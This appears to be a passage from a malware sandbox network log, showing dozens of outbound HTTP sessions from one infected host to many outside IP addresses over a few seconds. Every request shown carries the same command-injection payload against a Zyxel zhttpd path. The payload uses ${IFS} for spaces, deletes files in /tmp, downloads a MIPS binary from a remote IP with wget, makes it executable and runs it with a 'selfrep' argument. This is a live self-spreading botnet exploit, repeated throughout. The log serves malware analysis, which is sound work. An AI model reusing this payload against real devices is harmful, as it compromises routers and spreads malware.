                                                Jan 12, 2024 18:15:46.953013897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                172192.168.2.2360726101.134.6.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:46.953038931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                173192.168.2.2355680169.42.110.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:46.953038931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                174192.168.2.2336524112.64.239.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:47.956820965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                175192.168.2.2353092120.137.205.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:48.960613966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                176192.168.2.2350062180.60.169.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:48.960671902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                177192.168.2.2356408110.247.39.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:48.960680008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                178192.168.2.234899441.112.111.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:48.960719109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                179192.168.2.2355130117.164.37.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:48.960761070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                180192.168.2.2360946155.116.85.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:48.960762024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                181192.168.2.2356684209.16.232.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:48.960916996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                182192.168.2.234415284.37.252.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:48.960949898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                183192.168.2.233767857.129.98.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.964653015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                184192.168.2.2352500193.240.131.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.964689016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                185192.168.2.2348636154.242.189.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.964725971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                186192.168.2.2349706114.237.182.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.964747906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                187192.168.2.2344142129.204.138.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.964780092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                188192.168.2.235209653.62.237.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.964812040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                189192.168.2.2339146219.161.125.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.964833021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                190192.168.2.2356172103.181.69.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.964848995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                191192.168.2.235857419.252.247.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.964968920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                192192.168.2.2344824194.31.84.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.965049028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                193192.168.2.2334212135.27.139.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.965061903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                194192.168.2.235906074.219.153.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:49.965090990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                195192.168.2.23458145.243.244.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:50.969677925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                196192.168.2.234385288.96.247.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:50.969755888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                197192.168.2.2334476171.157.218.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:51.973249912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                198192.168.2.233762665.121.177.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:51.973300934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                199192.168.2.2356648222.118.112.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:51.973337889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                200192.168.2.2360094133.4.151.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:51.973378897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                201192.168.2.234146631.105.36.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:51.973408937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                202192.168.2.235030614.15.17.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:51.973503113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                203192.168.2.234264639.101.169.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:51.973572016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                204192.168.2.233502063.100.90.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:51.973572016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                205192.168.2.2355598146.216.61.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:51.973572016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                206192.168.2.235083043.115.207.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:51.973598957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                207192.168.2.234245217.138.177.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:52.978085995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                208192.168.2.2342198187.179.233.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:52.978130102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                209192.168.2.2356494164.120.100.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:52.978176117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                210192.168.2.23370444.111.40.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:52.978194952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                211192.168.2.233893063.222.103.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:52.978336096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                212192.168.2.2360686147.47.233.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:53.982682943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                213192.168.2.234420288.55.120.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:53.982739925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                214192.168.2.2360650142.9.108.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:53.982779980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                215192.168.2.2349900151.218.95.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:53.982903004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                216192.168.2.2354128163.3.221.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:57.001707077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                217192.168.2.234691859.154.28.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:57.001770973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                218192.168.2.2333702161.156.205.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:58.007549047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                219192.168.2.2334834174.49.207.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:58.007625103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                220192.168.2.2339558147.129.211.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:59.013544083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                221192.168.2.2335686208.133.7.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:00.018933058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                222192.168.2.2336192195.61.169.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:01.024928093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                223192.168.2.2345966191.119.218.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:01.025023937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                224192.168.2.2333888162.126.207.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:02.033087015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                225192.168.2.2355840191.209.219.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:02.033171892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                226192.168.2.233867458.28.173.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:02.033246040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                227192.168.2.2354936155.109.147.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:02.033353090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                228192.168.2.235298635.98.141.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038258076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                229192.168.2.233987666.71.6.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038328886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                230192.168.2.233356841.243.190.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038353920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                231192.168.2.234545451.171.182.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038384914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                232192.168.2.234787814.37.13.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038429976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                233192.168.2.2332990196.32.176.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:03.038471937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                234192.168.2.2334114101.149.179.150443
                                                TimestampBytes transferredDirectionData
